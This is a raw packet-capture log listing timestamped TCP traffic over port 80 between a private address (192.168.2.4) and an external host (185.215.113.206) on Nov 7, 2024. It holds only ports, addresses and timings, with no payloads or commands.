Nov 7, 2024 04:12:22.078010082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078458071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078469992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078480959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078493118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078501940 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078509092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078536034 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078563929 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078665972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078676939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078689098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078700066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078711033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078711033 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078738928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078738928 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078754902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078758955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078771114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078782082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078787088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078793049 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078804016 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078811884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078819036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078835964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078840971 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078841925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078866959 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078870058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078883886 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078891039 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078895092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078902006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078907013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078919888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078927040 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078932047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078934908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078950882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.078960896 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.078984976 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079057932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079068899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079080105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079091072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079102039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079104900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079118967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079123020 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079132080 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079134941 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079144001 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079154968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079165936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079174042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079176903 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079196930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079207897 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079214096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079226971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079233885 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079237938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079250097 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079256058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079261065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079277039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079298019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079303026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079322100 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079329967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079330921 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079343081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079354048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079354048 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079366922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079376936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079377890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079396009 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079399109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079407930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079418898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079420090 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079431057 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079442024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079442024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079456091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079472065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079474926 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079484940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079489946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079498053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079509020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079528093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079534054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079539061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079545021 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079554081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079566002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079571962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079577923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079588890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079597950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079602003 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079613924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079627037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079631090 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079638004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079648972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079648972 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079662085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079669952 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079674006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079685926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079698086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079699039 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079709053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079721928 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079731941 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079745054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079756975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079762936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079768896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079782009 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079788923 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079793930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079798937 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079807043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079813957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079818964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079829931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079843044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079843998 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079854965 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079854965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079885006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079890013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079901934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079914093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079914093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079926968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079935074 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079937935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079960108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079963923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079983950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.079983950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.079997063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080005884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080008030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080018997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080018997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080038071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080053091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080065966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080068111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080077887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080089092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080090046 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080101013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080112934 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080116034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080122948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080136061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080146074 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080157042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080168962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080178022 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080199003 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080204964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080210924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080215931 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080223083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080235004 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080246925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080250978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080250978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080271006 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080285072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080296040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080305099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080311060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080316067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080328941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080338955 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.080339909 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.080374956 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.191845894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191884995 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191903114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191915989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191926956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191937923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191955090 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.191962957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.191989899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192001104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192017078 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192029953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192038059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192050934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192061901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192073107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192084074 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192085028 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192109108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192112923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192132950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192135096 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192143917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192148924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192156076 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192174911 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192187071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192203999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192203999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192215919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192228079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192231894 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192240000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192262888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192280054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192281961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192293882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192305088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192339897 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192382097 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192393064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192420006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192425013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192435026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192440033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192447901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192455053 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192473888 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192492008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192492962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192507982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192518950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192523003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192538023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192539930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192550898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192553997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192578077 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192598104 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192605019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192614079 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192616940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192632914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192645073 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192657948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192657948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192675114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192677975 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192687035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192698956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192702055 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192702055 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192712069 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192714930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192727089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192738056 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192738056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192747116 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192771912 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192780972 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192790985 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192801952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192812920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192826033 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.192832947 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192842007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.192877054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.434218884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.439177990 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717513084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717535973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717547894 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717612028 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.717708111 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717775106 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.717793941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717807055 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717849970 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.717860937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717873096 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717885017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717897892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.717945099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.717976093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718044996 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718053102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718064070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718082905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718094110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718096018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718106031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718117952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718120098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718141079 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718153000 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718170881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718180895 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718190908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718202114 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718214989 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718219042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718231916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718238115 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718245029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718257904 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718262911 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718286037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718297005 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718307018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718307018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718336105 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718353033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718353987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718389988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718408108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718420982 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718430996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718450069 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718461037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718477964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718539000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718549967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718565941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718589067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718590975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718609095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718617916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718631029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718671083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718688965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:22.718712091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:22.718736887 CET	80	49755	185.215.113.206	192.168.2.4
